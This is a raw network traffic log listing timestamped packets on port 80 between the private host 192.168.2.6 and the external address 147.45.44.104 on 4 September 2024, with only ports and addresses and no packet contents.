Sep 4, 2024 17:37:08.105042934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105052948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105071068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.105086088 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.105685949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105696917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105705023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105726957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.105739117 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.105869055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105882883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105890989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105901003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105911016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105916023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.105921030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105931997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.105935097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.105947971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.105967045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106015921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106029034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106062889 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106173038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106183052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106190920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106199026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106209993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106215954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106220961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106225967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106234074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106244087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106244087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106264114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106281996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106296062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106337070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106628895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106640100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106648922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106661081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106679916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106692076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106813908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106828928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106837988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106852055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106859922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106862068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106869936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106873989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.106894970 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.106913090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107006073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107017040 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107024908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107034922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107043982 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107048035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107055902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107067108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107069016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107076883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107078075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107088089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107098103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107101917 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107108116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107124090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107126951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107139111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107140064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107151985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107157946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107161045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107171059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107173920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107182980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107192039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107196093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107215881 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107228994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107304096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107314110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107322931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107331991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107341051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107347012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107352018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107362032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.107367992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107383966 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.107400894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108056068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108067036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108074903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108084917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108093977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108103037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108103991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108123064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108150005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108198881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108213902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108222961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108232021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108241081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108246088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108251095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108259916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108264923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108264923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108272076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108280897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108290911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108294964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108300924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108318090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108328104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108333111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108340979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108350992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108361006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108364105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108371019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108381033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108386040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108392000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108403921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108406067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108417034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108443022 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.108467102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.108513117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109117031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109128952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109138012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109148979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109158039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109169006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109169960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109179020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109189987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109196901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109239101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109250069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109257936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109266043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109266043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109270096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109280109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109280109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109281063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109297991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109318972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109430075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109443903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109452009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109462023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109471083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109479904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109481096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109488010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109493971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109503984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109510899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109513998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109519005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109524965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109534025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109544039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109546900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109559059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109569073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109579086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109587908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.109606028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.109620094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110202074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110213041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110222101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110232115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110240936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110243082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110249996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110256910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110260963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110285044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110301018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110333920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110346079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110353947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110364914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110373974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110377073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110384941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110387087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110413074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110434055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110493898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110506058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110515118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110523939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110532999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110541105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110543966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110552073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110554934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110568047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110577106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110577106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110586882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110591888 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110598087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110608101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110614061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110618114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.110634089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.110647917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111260891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111275911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111284971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111294985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111303091 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111304998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111330032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111352921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111406088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111416101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111423969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111432076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111442089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111449957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111449957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111455917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111462116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111471891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111485958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111486912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111495972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111499071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111509085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111510992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111517906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111525059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111536026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111538887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111551046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111560106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111561060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111571074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111579895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111583948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111589909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111599922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.111605883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111617088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.111639023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.112021923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112035036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112044096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112067938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.112081051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.112168074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112179041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112186909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112195969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112205029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112215996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112217903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.112226963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112236023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112237930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.112251043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.112274885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.112304926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112318039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112325907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112337112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.112344027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.112365961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113159895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113169909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113179922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113203049 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113215923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113472939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113514900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113666058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113677979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113687992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113698006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113703966 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113707066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113718033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113720894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113720894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113729000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113739967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113749027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113749027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113760948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113764048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113771915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113784075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113801003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113823891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113842010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113851070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113859892 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113868952 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113869905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113881111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113883018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113889933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113899946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.113903999 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113926888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.113982916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114018917 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114639997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114654064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114662886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114671946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114681959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114687920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114692926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114701986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114708900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114712000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.114722013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.114722967 CEST	80	49717	147.45.44.104	192.168.2.6
